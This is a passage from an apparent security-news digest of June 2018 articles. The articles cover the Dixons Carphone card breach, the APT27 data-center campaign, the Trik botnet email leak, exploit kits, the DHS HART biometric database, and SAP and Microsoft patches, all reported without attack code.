Technical concerns focus on why it took so long for Dixons Carphone to discover the breach. Robert Wassall, data protection lawyer and head of legal services at ThinkMarble, comments, "The fact that this breach has only just been identified through a routine security review can be viewed from two sides. Yes, it's great that this breach was identified as it proves that the review process and scanning for vulnerabilities works. On the other hand, the breach began in July 2017, why wasn't it identified sooner? How often is security scanning done, given that it has taken almost a year to be found?"

Ross Brewer, VP and MD EMEA at LogRhythm, is less accommodating. "The scale and time-frame of this data breach is staggering," he says. "Initial attempts to access data began in July last year, yet this was only discovered over the past week, indicating that the company lacks vital threat detection capabilities."

The breach notification concerns center around the Dixons Carphone statement. Some commenters praise the apparent speed and fulness of its notification to victims. Ilia Kolochenko, CEO and founder of web security company High-Tech Bridge, says, "With over a billion of compromised records last year, I think this particular incident is of small importance. Many similar breaches occur every day and alas remain unnoticed. Unless we have evidence of malicious exploitation of the allegedly stolen data, no major detriment is imputable upon the victims. In light of these facts, Dixons Carphone's decision to disclose - is rather laudable, albeit one may question the timeline of the disclosure. Many other companies are much less courageous to tell the truth, as even in light of GDPR enforcement, the new law cannot monitor proper disclosure of inconspicuous data breaches."

Others, however, fear that the statement attempts to minimize actual harm over and above warning the victims about potential future harm. Dixons Carphone chief executive, Alex Baldock, said, "we have currently no evidence of fraud as a result of these incidents." The statement also implies that victims needn't worry about their card details, since by far the majority are chip and PIN cards, and no CVVs were included. It does not mention the potential for phishing and other social engineering scams targeted against actual or just potential Dixons Carphone breach victims.

Trevor Resche, threat intelligence office at Trusted Knight, is forthright. "Today's breach of Dixons data will have far reaching consequences for some time. While Dixons has said that there is no evidence of fraud taking place, now the data is in the criminal sphere, it's unlikely to be long before it starts being shopped around amongst criminals, with ensuing phishing and bruteforce attacks launched."

For the moment, we don't know enough about the breach. Dixons Carphone is now working with law enforcement (NCSC), with the financial regulator (FCA), the data protection regulator (ICO), and "leading cyber security experts." While victims will need to monitor their bank accounts closely and be suspicious of all incoming Dixons Carphone-related emails; businesses in general and the cybersecurity industry in particular will be monitoring the reaction of the data protection regulator. If the ICO finds that Dixons Carphone was negligent in its protection of customer data, it could levy a significant fine.


Apple Steps Up Encryption to Thwart Police Cracking of iPhones
14.6.2018 securityweek Apple  

Apple said Wednesday it was strengthening encryption on its iPhones to thwart police efforts to unlock handsets without legitimate authorization.

The move by Apple, the latest in an ongoing clash with law enforcement, comes amid reports of growing use of a tool known as GrayKey which can enable police to bypass iPhone security features.

Apple said the new features are not designed to frustrate law enforcement but prevent any bypassing of encryption by good or bad actors.

"At Apple, we put the customer at the center of everything we design," the company said in a statement.

"We're constantly strengthening the security protections in every Apple product to help customers defend against hackers, identity thieves and intrusions into their personal data. We have the greatest respect for law enforcement, and we don't design our security improvements to frustrate their efforts to do their jobs."

Apple said it was working a fix to mitigate the possibility of accessing data from GrayKey or similar tools.

Apple said that it has a team that responds to law enforcement and national security requests 24 hours a day. But the company has been a target of some in law enforcement for rejecting efforts to allow easy access to iPhones.

Two years ago, Apple went to court to block an FBI effort to force it to weaken iPhone encryption on the device of a mass shooter in San Bernardino, California, but officials dropped the case after finding a tool to unlock the phone.


World Cup: US Spy Warns Russians Will Hack Phones, Computers
14.6.2018 securityweek   Hacking

A top US intelligence official warned football fans traveling to Russia for the World Cup that their phones and computers could be hacked by Moscow's cyber spies.

William Evanina, Director of the National Counterintelligence and Security Center, said that in Russia, even people who believe they are too unimportant to be hacked can be targeted.

"Anyone traveling to Russia to attend the World Cup should be clear-eyed about the cyber risks involved," Evanina said in a statement.

"If you're planning on taking a mobile phone, laptop, PDA, or other electronic device with you -- make no mistake -- any data on those devices (especially your personally identifiable information) may be accessed by the Russian government or cyber criminals."

Evanina, in charge of the agency that assesses and counters the threat to the Untied States from foreign espionage, said that people attending the World Cup, which begins on Thursday, should leave behind any devices they can do without.

For devices they take with them, they should remove the battery when it is not in use, he said.

"Corporate and government officials are most at risk, but don’t assume you're too insignificant to be targeted."


China-linked Emissary Panda APT group targets National Data Center in Asia
14.6.2018 securityaffairs  APT

A China-linked APT group, LuckyMouse, Emissary Panda, APT27 and Threat Group 3390, has targeted a national data center in Central Asia.
The APT group has been active since at least 2010, the crew targeted U.S. defense contractors and financial services firms worldwide.

In March 2018, security experts at Kaspersky Lab have observed an attack powered by the Chinese APT group, the experts speculate the campaign was started in the fall of 2017.

The attack hit a national data center in an unnamed country in Central Asia, according to Kaspersky, the hackers were preparing a watering hole attack. The hackers attempted to inject malicious JavaScript code into the government websites connected to the data center.

“In March 2018 we detected an ongoing campaign targeting a national data center in the Central Asia that we believe has been active since autumn 2017. The choice of target made this campaign especially significant – it meant the attackers gained access to a wide range of government resources at one fell swoop.” reads the blog post published by Kaspersky.

“We believe this access was abused, for example, by inserting malicious scripts in the country’s official websites in order to conduct watering hole attacks.”

The attackers compromised the government website to deliver either the Browser Exploitation Framework (BeEF) or the ScanBox reconnaissance framework. At the time of the report, experts were not able to determine the way the hackers breached the government website.

“The websites were compromised to redirect visitors to instances of both ScanBox and BEeF. These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer.” continues the post.

One of the hypotheses formulated by Kaspersky sees the hackers using weaponized Office documents to trigger the CVE-2017-11882 vulnerability, the same issue exploited by other APT groups like the Cobalt hacking group.

The campaign monitored by Kaspersky leveraged a RAT tracked by Kaspersky as HyperBro, the code was associated with other Chinese-speaking threat actors.

The timestamps for these modules are from December 2017 until January 2018.

Emissary Panda data center hack

The main command and control (C&C) server used in this campaign is bbs.sonypsps[.]com which is hosted on an IP address associated with a Ukrainian ISP. The IP address belongs to a MikroTik router running a firmware version 6.34.4 released in March 2016, the device with SMBv1 on board may have been hacked by the Emissary Panda hackers.

“The TTPs for this campaign are quite common for Chinese-speaking actors,” concludes Kaspersky.

“The most unusual and interesting point here is the target. A national data center is a valuable source of data that can also be abused to compromise official websites. Another interesting point is the Mikrotik router, which we believe was hacked specifically for the campaign. The reasons for this are not very clear: typically, Chinese-speaking actors don’t bother disguising their campaigns. Maybe these are the first steps in a new stealthier approach.”

Further details, including the IoCs are reported in the analysis published by Kaspersky.


Researcher found 43 Million email addresses leaked by the Trik spam botnet
14.6.2018 securityaffairs  BotNet

A security researcher from Vertek Corporation reported to Bleeping Computer that over 43 million email addresses have been leaked from the command and control server of a spam botnet.
An expert from Vertek Corporation spotted the C&C server while investigating a recent malware campaign distributing a version of the Trik trojan. The malicious code was used as a first-stage malware that was used to drop, which was used to drop GandCrab v3 ransomware.

Malware experts from the Proofpoint firm have recently begun tracking the Phorpiex/Trik botnet that was used by sophisticated threat actors to distribute a range of malware.

“It is not especially sophisticated or complex but has been active for almost a decade, flying under the radar and attracting a solid customer base of threat actors.” reads the analysis published by Proofpoint.

“As we began tracking this botnet more closely, we discovered that a number of familiar actors were repeatedly leveraging Trik’s power and distribution capabilities for delivery of their malware.”

Both malware would download the malicious files from a misconfigured server located on a Russian IP address.

The content of the server was accessible to anyone, the researcher discovered 2201 text files, labeled sequentially from 1.txt to 2201.txt containing chunks of roughly 20,000 email addresses, each.

“The Vertek researcher believes the operators of this server have been using these recipient lists to service other crooks who contracted their services to distribute various malware strains via malspam campaigns.” reported Bleeping Computer.

spam leak Trik trojan

“We pulled all of them to validate that they are unique and legitimate,” the researcher told Bleeping Computer earlier today. “Out of 44,020,000 potential addresses, 43,555,741 are unique.”

The researcher shared its findings with working with the popular cyber security expert Troy Hunt that runs the Have I Been Pwned service, to determine the origin of the data.

The huge trove of email addresses is from everywhere, the expert counted 4.6 million unique email domains (i.e. .gov, .com, and domain of several private businesses).

The vast majority of email addresses are old, (Yahoo (10.6 million) and AOL (8.3 million)).

“Surprisingly, while there are many custom email domains included in the leak, there are very few Gmail addresses included, suggesting the email addresses database is either incomplete, or this malware campaign intentionally targeted users using older email services.” continues Bleeping Computer.

The Trik C&C server discovered by the expert is going offline at intermittent intervals.

Below the Top 10 email domains included in the leaked data:

8907436 yahoo.com
8397080 aol.com
788641 comcast.net
433419 yahoo.co.in
432129 sbcglobal.net
414912 msn.com
316128 rediffmail.com
294427 yahoo.co.uk
286835 yahoo.fr
282279 verizon.net


June 12 2018 Historic Edition of Cyber Defense eMagazine Has Arrived. Over 150 pages…
14.6.2018 securityaffairs  Cyber

June 12, 2018 – Cyber Defense eMagazine is arrived – OVER SIX THOUSAND PAGES – SIX YEARS – #1 GLOBAL SOURCE FOR CYBER DEFENSE
Cyber Defense eMagazine
June 2018 Edition has arrived.

We hope you enjoy this month’s edition…packed with over 150 pages of excellent content. InfoSec Knowledge is Power. We have 6 years of eMagazines online with timeless content. Visit our online library by clicking here. Please tell your friends to

subscribe – no strings, always free emagazines:

cyber defense emagazine

FLIPBOOK

http://www.cyberdefensemagazine.com/newsletters/june-2018/index.html

PDF

http://www.cyberdefensemagazine.com/newsletters/june-2018/CDM-CYBER-DEFENSE-eMAGAZINE-June-2018.pdf

MOBILE

http://www.cyberdefensemagazine.com/newsletters/june-2018/mobile/index.html

Our InfoSec awards are annually given out at the RSA Conference in the United States every year, Q1. USA 2018 Awards – CLOSED.

Congratulations to our InfoSec Awards 2018 Winners!

WANT TO SEE THE 200 INNOVATORS THAT MADE THE CUT THIS YEAR?

CLICK THIS LINK, HERE.

Our Global Awards are annually given out at the IPEXPO Conference as a global event in Europe every year, Q4. GLOBAL 2018 Awards – OPEN. Click here to apply.

MAGAZINES TV AWARDS and more platforms under development…

Sincerely,

TEAM CDM

Cyber Defense Magazine

P.S. Thanks to our awesome sponsors – media kits available here.

We are all things Cyber Defense. Thank you to our amazing readership!

Copyright (C) 2018, Cyber Defense Magazine, part of the Cyber Defense Media Group,

a d/b/a of STEVEN G. SAMUELS LLC CyberDefense.TV launching in 2H 2018

848 N. Rainbow Blvd. #4496, Las Vegas, NV 89107. EIN: 454-18-8465, DUNS# 078358935.


Exploit Kits Target Recent Flash, Internet Explorer Zero-Days
13.6.2018 securityweek 
Exploit

Exploit kits (EKs) might not be as dominant as they were several years ago, but they continue to exist and most of them already adopted exploits for recently discovered Flash and Internet Explorer zero-day vulnerabilities.

The first of the flaws is CVE-2018-4878, a security bug in Adobe’s Flash Player discovered in late January, when it was exploited by a North Korean hacker group in attacks aimed at individuals in South Korea. Adobe released a patch within a week after the bug became public, but it continued to be targeted in numerous other attacks.

The second is CVE-2018-8174, a critical issue that allows attackers to remotely execute arbitrary code on all supported versions of Windows, and which was addressed with the May 2018 Patch Tuesday updates. The bug is an update to a 2-year-old VBScript vulnerability (CVE-2016-0189) that continues to be abused in attacks.

The recently patched Flash Player zero-day tracked as CVE-2018-5002, which has been exploited in targeted attacks, has yet to be added to EKs.

“Since both Flash and the VBScript engine are pieces of software that can be leveraged for web-based attacks, it was only natural to see their integration into exploit kits,” Malwarebytes points out.

Within days after a proof of concept became publicly available, RIG adopted the exploit for the new VBScript engine flaw, becoming the first EK to do so. The toolkit also added an exploit for said Flash bug, and was observed pushing payloads such as Bunitu, Ursnif, and the SmokeLoader backdoor.

Magnitude continues to focus on South Korea and is now targeting both CVE-2018-4878 and CVE-2018-8174. The toolkit is considered one of the most sophisticated EKs on the market, courtesy of its own Magnigate filtering, a Base64-encoded landing page, and fileless payload.

Another active EK is GreenFlash Sundown. Rather elusive in nature, it “continues to strike via compromised OpenX ad servers” and now targets CVE-2018-4878 too. Usually delivering the Hermes ransomware, it was recently observed serving a cryptocurrency miner.

The GrandSoft EK, which only targets Internet Explorer and also appears in smaller distribution campaigns, is still relying on the older CVE-2016 -0189 Internet Explorer exploit. Lacking the obfuscation EK landing pages usually feature, the toolkit was observed delivering payloads such as the AZORult stealer.

“There is no doubt that the recent influx of zero-days has given exploit kits a much-needed boost. We did notice an increase in RIG EK campaigns, which probably resulted in higher than usual successful loads for its operators. While attackers are concentrating on Microsoft Office–related exploits, we are observing a cascading effect into exploit kits,” Malwarebytes concludes.


Australia Agrees Solomons Internet Cable After China Concern
13.6.2018 securityweek IT

Australia will help fund and build an underseas communications cable to the Solomon Islands, it was agreed Wednesday, after the Pacific nation was convinced to drop a contract with Chinese company Huawei.

The impoverished country and Huawei inked a deal in late 2016 to construct the fibre-optic cable from Australia to Honiara to improve its often unreliable internet and phone services.

But Solomon Islands Prime Minister Rick Houenipwela said last week there had been a change of heart following "some concerns raised with us by Australia", without elaborating.

The move comes with Australia refocusing its foreign aid programmes to win hearts and minds in the island nations of the Pacific, as China flexes its muscle in the region.

It pledged more than Aus$1.3 billion (US$970 million) in its national budget last month to fund projects such as the communications cable, which will also link-up with Papua New Guinea.

Canberra and other regional capitals have become increasingly alarmed at Beijing's push into the Pacific through "soft diplomacy", which could potentially upset the strategic balance in the region.

Australian Foreign Minister Julie Bishop refused to detail what concerns Canberra had with telecom giant Huawei.

"I would not elaborate on security issues, that's not appropriate," she told reporters.

"What we have offered the Solomon Islands, and they have accepted, is an alternative to the offer, and ours is cheaper. It's likely to be a faster result for them, and technically superior."

Huawei was blocked from bidding for contracts on Australia's ambitious national broadband project in 2012, reportedly due to concerns about cyber-security.

Huawei has long disputed claims of any links to the Chinese government.

According to broadcaster ABC, Australia's spy boss Nick Warner and other senior officials visited the Solomons last year and returned with concerns about Huawei being permitted to plug into the country's telecommunications infrastructure.

They reportedly believed that while Huawei was an independent company, it retained links to the Chinese government and could pose a threat to Australian infrastructure in the future.

After meeting Houenipwela in Canberra Wednesday, Prime Minister Malcolm Turnbull said Australia will also jointly fund a domestic telecommunication cable network linking remote provinces in the Solomons to the capital Honiara.

"As we step up our engagement in the Pacific, we are working as partners with Solomon Islands more closely than ever to ensure stability, security and prosperity in the region," he said.


DHS HART Biometric Database Raises Security, Civil Liberties Concerns
13.6.2018 securityweek BigBrothers

Protecting the DHS HART National Biometric Database Against Theft and Abuse

In February 2018, Northrop Grumman Corporation announced that it had been awarded a $95 million contract to develop increments one and two of the Department of Homeland Security (DHS) Homeland Advanced Recognition Technology (HART) system.

The announcement said very little about HART, except that it is a "multi-modal processing and matching technology that uses a combination of face, finger and iris biometrics meeting DHS accuracy requirements." It is a database and system designed to incorporate, expand and replace the existing Automated Biometric Identity System (IDENT) built in the 1990s.

Last week the Electronic Frontier Foundation (EFF) provided more information on HART. In a Deeplinks blog, senior staff attorney Jennifer Lynch explained, "The agency's new Homeland Advanced Recognition Technology (HART) database will include multiple forms of biometrics -- from face recognition to DNA, data from questionable sources, and highly personal data on innocent people. It will be shared with federal agencies outside of DHS as well as state and local law enforcement and foreign governments."

HART will support, she expands, "at least seven types of biometric identifiers, including face and voice data, DNA, scars and tattoos, and a blanket category for 'other modalities'. It will also include biographic information, like name, date of birth, physical descriptors, country of origin, and government ID numbers. And it will include data we know to be highly subjective, including information collected from officer 'encounters' with the public and information about people's 'relationship patterns'."

EFF's primary concern over this vast new database of DNA, physical biometrics and social behavior is what it describes as the chilling effect on people exercising their First Amendment-protected rights to speak, assemble and associate. "Data like face recognition makes it possible to identify and track people in real time, including at lawful political protests and other gatherings," she writes.

Through EFF's understanding of the HART project and its concern over civil liberties, we now know more about the DHS biometric database. But there are other concerns beyond civil liberties. Security for this vast trove of the nation's most personal information is never mentioned. Indeed, Northrop Grumman's contract announcement merely states, "A keen focus on safeguarding personally identifiable information as well as ensuring the critical sharing of data across interagency partners underpins the technology."

But government does not have a good track record in securing the data it holds. In 2015, The Office of Personnel Management lost personal information on 21.5 million people to what is generally believed to be Chinese government-sponsored hackers.

In 2010, Chelsea Manning (born Bradley Manning) leaked 750,000 classified or sensitive military and diplomatic documents to WikiLeaks, including the infamous 'collateral murder' Baghdad airstrike video.

In 2013, Edward Snowden exfiltrated and leaked thousands of classified NSA documents exposing NSA and GCHQ clandestine global surveillance programs.

In 2016, the hacking group known as The Shadow Brokers leaked a series of exploits stolen from the Equation Group – believed to be the Tailored Access Operations (TAO) unit of the NSA. One of these exploits, EternalBlue, was used in both the WannaCry ransomware and NotPetya cyberattacks of 2017.

In March 2017, WikiLeaks began publishing a series of CIA classified documents and cybersecurity exploits under the name Vault 7.

These incidents demonstrate that government databases have historically been susceptible to both external hacks and insider breaches. However, the extent to which the HART database will become a magnetic target for hackers is conjecture, and not universally agreed.

Joseph Carson, chief security scientist at Thycotic, doesn't believe the database will be very attractive to hackers. "The only reason this would be attractive to cybercriminals," he told SecurityWeek, "would be to sell it onwards to nation states who would use such data for intelligence or economic advantages. However, the data alone would not be as valuable without the technology that analyzes the metadata for matches and relationships. So, cybercriminals and nation states would need to compromise both to make value of the stolen data."

Others take a different view. "This massive, aggregated database will represent an incomparable trove of intelligence about US citizens. You can be sure it will be a target," said Rick Moy, CMO at Acalvio.

Migo Kedem, director of product management at SentinelOne, adds, "There will be many criminals and states who would like to get their hands on this type of information, ranging from commercial and marketing, through business espionage to state level."

Protecting this database from external hackers, whether organized crime or nation states, is going to be a challenge. But it will be equally difficult to protect it from insiders. According to the EFF's figures, the IDENT fingerprint database already holds data on 220 million individuals, and processes 350,000 fingerprint transactions every day. The full HART database will go far beyond just fingerprints, and will be shared with federal agencies outside of DHS, with state and federal law enforcement, and even with foreign governments.

The ability to control everybody with access to the database will consequently be another challenge – health workers and policemen already covertly query their own databases to provide information for worried friends and relatives. The temptation to check on the relationship patterns of a daughter's new boyfriend – if possible – is just one danger. Looking at private industry, High-Tech Bridge CEO Ilia Kolochenko told SecurityWeek, "Data protection is certainly a high priority in large companies such as Google or Apple, but as we recently saw with Facebook – authorized third-parties are the uncontrollable Achilles' heel."

The subversion of authorized users through bribery, blackmail or stolen credentials is another difficulty. "When human interactions are involved, it is generally the easiest link to compromise," says SentinelOne's Kedem.

Just as securing access to the HART database will be difficult, so too will be securing the use of the database. While it can provide value to its users manually, there is little doubt that machine learning and artificial intelligence will be used to help locate the needles in this massive haystack. This is particularly concerning because of the intention to include 'relationship patterns', which will be easier sifted with AI than manual searches.

Indeed, it is tempting to wonder if HART will become the basis for the FBI's often-promised move into 'predictive policing'. Thycotic's Carson believes this is probable. "This goes way back," he said. "'Trapwire' was exposed by Wikileaks back in 2012 resulting from the Stratfor hacks. It reportedly used CCTV surveillance to recognize people from their facial biometrics, how they walked and even from the clothing they wear. The purpose of such technology was prioritized for national security and it has been known that such technology had existed; but this was a clear indication that it was formerly in use. However, it is now clear that such data is being used beyond national security in both government and commercial use for profit and control."

Acalvio's Rick Moy simply said, "Predictive models need tons of data, so it would certainly be an enabler."

But this brings us to the next problem: false positives potentially generated by built-in bias in the artificial intelligence algorithms. Carson is not too concerned: "I would assume the results would have to be verified by a human. The AI and machine learning is typically to find the needle in a haystack and a human is used to validate the results."

Moy, however, does have concerns. "False positives come with any algorithm based on diverse data inputs. Bias is a human trait, and humans are still writing the algorithms. But it's worth noting that there's quite a difference between searching for known features of a past incident versus asking a system what the most relevant features of an incident were, versus predicting who will commit a future crime."

The implication is that use of the HART database to identify suspects is likely to be very accurate; but its use to predict criminal, terrorist or simply anti-social behavior would be worrying. If there is a bias against certain ethnic groups for, say, criminal or terrorist activity within society and existing records, that bias can potentially be transferred to the AI algorithms resulting in damaging and far-reaching false positives.

"US Congress needs to look at the old adage of 'we could, but should we?' while going forward with the DHS HART database," comments Abhishek Iyer, Technical Marketing Manager at Demisto. "AI and ML algorithms often mirror and amplify the biases of the data collected. If DHS investigation will be based on biometric recognition whose accuracy is already compromised by bias, it can lead to wrongful arrests, distress for US travelers, and lost government resources."

There is little doubt that a national biometric database could help law enforcement. But at what cost? The Electronic Frontier Foundation fears is will damage freedom of speech and association, and massively impinge upon personal privacy. But the challenges posed by HART go beyond civil liberties. Securing both access to and use of the data is going to be very difficult.


SAP Releases Critical Updates for Two Security Notes
13.6.2018 securityweek 
Vulnerebility

Of the ten Security Notes in SAP’s June 2018 Security Patch Day, five were updates for previously released Notes, including two rated Hot News (Critical severity).

Impacting SAP Business Client (version 6.5) and SAP BASIS (versions 7.31, 7.40, 7.50, 7.51, 7.65, 7.66), the two Hot News Security Notes feature CVSS scores of 9.8 and 9.1, respectively.

The former is an update for a Security Note released on April 2018 Patch Day, described as security updates for third party web browser controls delivered with SAP Business Client, while the latter is an update for a Note released on November 2016 Patch Day, described as an OS command injection vulnerability in the Report for Terminology Export component.

The remaining Security Notes address four vulnerabilities considered High severity (including an update to a Security Note released on April 2018 Patch Day) and four Medium risk flaws (two are updates to Security Notes released on August 2014 Patch Day and May 2018 Patch Day, respectively), SAP’s advisory reveals.

The most important of the high-risk flaws is an information disclosure vulnerability (CVE-2018-2425) in SAP Business One (CVSS Base Score: 8.4). The bug exists in the Business One version for the SAP HANA backup service and could allow an attacker to access information which would otherwise be restricted, Onapsis explains.

Next in line is a remote command execution flaw (CVE-2015-0899) in SAP Internet Sales (CVSS Base Score: 7.5), followed by a denial-of-service bug (CVE-2014-0050) in SAP Internet Sales (CVSS Base Score: 7.3).

The last high-risk Security Note released this month is an update to a previous Note addressing CVE-2018-2408 (CVSS Base Score: 7.3), an improper session management bug in SAP Business Objects.

The Medium risk flaws addressed this month include a cross-site scripting (XSS) vulnerability in SAPUI5 (CVE-2018-2424) and information disclosure in UI5 Handler (CVE-2018-2428). They are accompanied by an update to a Security Note addressing a potential remote code execution in SAP CrystalReports, and another patching a missing XML validation vulnerability in SAP Identity Management (CVE-2018-2416).

According to ERPScan, a company that secures Oracle and SAP products, the June 2018 Patch Day also includes 4 Support Package Notes, for a total of 14 Notes. Half of the Notes were released after the second Tuesday of the last month and before the second Tuesday of this month.

The most common vulnerability types addressed this month are XSS and remote command execution, followed by implementation flaws and information disclosure. SAP also addressed XML external entity, DoS, OS command execution, and buffer overflow issues.


Google Removes Inline Installation of Chrome Extensions
13.6.2018 securityweek Crime

Google this week detailed plans to completely remove the inline installation of Chrome extensions from its web browser by the end of the year.

Introduced in 2011, inline installation was meant to make it easier for users to add extensions to the browser by installing them directly from the developer’s website instead of having to go to the Chrome Web Store.

Starting this Tuesday, June 12, inline installation is no longer available for newly published extensions. This fall, however, the change will also affect existing extensions, Google says.

“Extensions first published on June 12, 2018 or later that attempt to call the chrome.webstore.install() function will automatically redirect the user to the Chrome Web Store in a new tab to complete the installation,” James Wagner, Extensions Platform Product Manager at Google, explains.

The next stage will enter into effect on September 12, 2018. Starting that day, inline installation will be disabled for existing extensions, meaning that all users will be automatically redirected to the Chrome Web Store in order to complete installations.

The final nail in the coffin, however, will be put in early December 2018, when Chrome 71 arrives. That browser release, the search company says, will be stripped of the inline install API method.

“Later this summer, inline installation will be retired on all platforms. Going forward, users will only be able to install extensions from within the Chrome Web Store, where they can view all information about an extension’s functionality prior to installing,” Wagner revealed.

According to Google, the removal of inline installation of extensions would add more transparency for Chrome users. Many of these users, the company claims, complain about unwanted extensions on their browser, with most of the complaints referring to “confusing or deceptive uses of inline installation on websites.”

To eliminate the issue, the search provider says, users will be redirected to the Chrome Web Store instead, where detailed information on what’s being installed is available. Thus, users will “fully understand how their browsing experience will be impacted.”

Developers with extensions that use inline installation need to update the install buttons on their website to link to the extension’s Chrome Web Store page prior to the stable release of Chrome 71.

Several years ago, Google disabled the inline installations for Chrome extensions for developers who used deceptive tactics to trick users into installing their products.

Over the past several years, millions of Chrome users were impacted by malicious extensions published to the Chrome Web Store. Some of these applications could lead to the injection and execution of arbitrary JavaScript code, while others were hijacked to display potentially malicious ads and steal user credentials.


Chinese Cyberspies Target National Data Center in Asia
13.6.2018 securityweek APT

A China-linked cyber espionage group has targeted a national data center in Central Asia and experts believe the goal is to conduct watering hole attacks on the country’s government websites.

The threat actor is tracked as LuckyMouse, Emissary Panda, APT27 and Threat Group 3390. The group has been active since at least 2010, targeting hundreds of organizations around the world, including U.S. defense contractors, financial services firms, a European drone maker, and the U.S.-based subsidiary of a French energy management company.

Researchers at Kaspersky Lab recently identified a new attack carried out by this actor. The security firm spotted the campaign in March 2018, but believes it was launched in the fall of 2017.Chinese hackers attack national data center in Central Asia

The attack targeted a national data center in an unnamed country in Central Asia. Researchers say the goal is likely to inject malicious JavaScript code into the government websites connected to the data center in order to conduct watering hole attacks.

When accessed, the compromised government websites served either the Browser Exploitation Framework (BeEF), a penetration testing suite that focuses on the web browser, or the ScanBox reconnaissance framework.

Kaspersky has not been able to determine how the national data center was breached, but believes the hackers may have used watering hole attacks aimed at the organization’s employees or through weaponized Office documents – the threat group has been spotted using CVE-2017-11882.

The attack involved a piece of malware tracked by Kaspersky as HyperBro, a RAT that has been used by several Chinese-speaking threat actors. The samples analyzed by Kaspersky had timestamps ranging from December 2017 to January 2018, with evidence found by experts suggesting that the malware had made its way to the data center sometime in mid-November 2017.

The main command and control (C&C) server used in this campaign is hosted on an IP address associated with a Ukrainian ISP. Specifically, the IP belongs to a MikroTik router running a firmware version released in March 2016.

“A national data center is a valuable source of data that can also be abused to compromise official websites,” Kaspersky researchers said in a blog post. “Another interesting point is the Mikrotik router, which we believe was hacked specifically for the campaign. The reasons for this are not very clear: typically, Chinese-speaking actors don’t bother disguising their campaigns. Maybe these are the first steps in a new stealthier approach.”


Dixons Carphone data breach, 5.9 million payment cards exposed
13.6.2018 securityaffairs Incindent

Retailer Dixons Carphone has disclosed a security breach that involved 5.9 million payment cards and 1.2 million personal data records.
Dixons Carphone discovered an “unauthorised access” to certain data held by the company, it promptly launched an investigation and hired an external firm to shed the light on the case.

The company immediately reported the hack to law enforcement, regulators at the Information Commissioner’s Office and the Financial Conduct Authority.

“As part of a review of our systems and data, we have determined that there has been unauthorised access to certain data held by the company.” reads the data breach notification published by the company.

“Our investigation is ongoing and currently indicates that there was an attempt to compromise 5.9 million cards in one of the processing systems of Currys PC World and Dixons Travel stores. However, 5.8m of these cards have chip and pin protection. The data accessed in respect of these cards contains neither pin codes, card verification values (CVV) nor any authentication data enabling cardholder identification or a purchase to be made. “

The retailer explained that it has no evidence to date of any abuse of the data as result of the hack. The bad news for the customers is that the compromised information included payment card data.

Dixons Travel confirmed that hackers could have accessed data of 5.9 million cards stored in one of the processing systems of Currys PC World and Dixons Travel stores. The company highlighted that 5.8 million of these cards have chip and PIN protection, in these case crooks may have accessed card data contains neither PIN codes, card verification values (CVV) nor any authentication data enabling cardholder identification or a purchase to be made.

Roughly 105,000 non-EU issued payment cards that do not use chip and PIN protection have been compromised.

The firm notified the relevant card companies via its payment provider about all compromised cards.

“Separately, our investigation has also found that 1.2m records containing non-financial personal data, such as name, address or email address, have been accessed. We have no evidence that this information has left our systems or has resulted in any fraud at this stage. We are contacting those whose non-financial personal data was accessed to inform them, to apologise, and to give them advice on any protective steps they should take.” added the company.

This isn’t the first time that the company suffers a security breach, in 2015 another incident exposed the credit card details of 90,000 Dixons Carphone customers.

Affected customers are anyway potentially exposed to phishing attacks and have to be vigilant.


Microsoft Releases Mitigations for Spectre-Like 'Variant 4' Attack
13.6.2018 securityweek 
Vulnerebility

Updates released by Microsoft on Tuesday for its Windows operating system add support for a feature that should prevent attacks involving the recently disclosed speculative execution vulnerability known as “Variant 4.”

Researchers from several organizations warned in January that processors from Intel, AMD, ARM and other companies are affected by vulnerabilities that allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data. The flaws are tracked as Spectre (Variant 1 - CVE-2017-5753 and Variant 2 - CVE-2017-5715) and Meltdown (Variant 3 - CVE-2017-5754).

Last month, Intel, AMD, ARM, IBM, Microsoft and other major tech companies released updates, mitigations and advisories for two new variants of the speculative execution attack methods, namely Variant 3a and Variant 4.

Variant 4, which is similar to Spectre Variant 1, relies on a side-channel vulnerability known as Speculative Store Bypass (SSB) and it has been assigned the identifier CVE-2018-3639.

Microsoft has not identified any code patterns – in either its software or cloud services – that would allow Variant 4 attacks. However, the company announced on Tuesday – along with its monthly security updates – that it added support for Speculative Store Bypass Disable (SSBD) to Windows and Azure in an effort to completely eliminate the risk of attacks.

SSBD is designed to prevent a Speculative Store Bypass from occurring, but Microsoft noted that enabling the feature also requires microcode updates from Intel.

Microsoft has released updates that include the mitigation for Windows 10, Windows 7, Windows Server 2008, Windows Server 2016, and Windows Server versions 1709 and 1803. Support for SSBD has only been added for machines with Intel processors, but the company is working on updates for AMD devices as well. Systems powered by AMD CPUs will not require microcode updates.

When Variant 4 was disclosed, Intel announced that it had provided beta microcode updates to operating system vendors and equipment manufacturers to add support for SSBD.

However, Intel says the mitigation will be turned off by default and the company believes many will leave it that way.

Enabling SSBD may have some negative impact on performance, Microsoft and Intel said. Intel told customers last month that performance impact during its tests ranged between 2 and 8 percent.


Microsoft Patches 11 Critical RCE Flaws in Windows, Browsers
13.6.2018 securityweek 
Vulnerebility

Microsoft’s Patch Tuesday updates for June 2018 address a total of 50 vulnerabilities, including nearly a dozen critical remote code execution flaws affecting Windows and the company’s Edge and Internet Explorer web browsers.

None of the security holes patched this month appear to have been exploited for malicious purposes, but one of them has been publicly disclosed before the release of a fix. The disclosed vulnerability is a use-after-free issue that allows an attacker to execute arbitrary code if they can convince the targeted user to open a malicious web page or file. The weakness was reported to Microsoft through Trend Micro’s Zero Day Initiative (ZDI), which made some details public after its 120-day deadline expired.

The list of critical vulnerabilities also includes CVE-2018-8225, which impacts the Windows DNS component DNSAPI.dll. An attacker can leverage this flaw to execute arbitrary code in the context of the Local System Account by using a malicious DNS server to send specially crafted DNS responses to the targeted system.

Another critical RCE flaw, which Microsoft believes could be exploited in the wild at some point, is CVE-2018-8251 and it impacts the Windows Media Foundation component. An attacker can exploit this flaw to take complete control of a system by getting the targeted user to open a malicious web page or document.

A security hole affecting the HTTP Protocol Stack (Http.sys) allows remote code execution by sending a specially crafted packet to the targeted server. While the flaw can be exploited without authentication and is considered critical, Microsoft believes exploitation is “less likely.”

The latest security updates also resolve a privilege escalation vulnerability affecting the Cortana voice assistant. The flaw, related to an issue disclosed earlier this year by researchers Amichai Shulman and Tal Be’ery, has been classified as “important” as exploitation requires physical or console access and the targeted system needs to have Cortana enabled.

Microsoft also released some mitigations for the recently disclosed Variant 4 of the Spectre/Meltdown vulnerabilities.

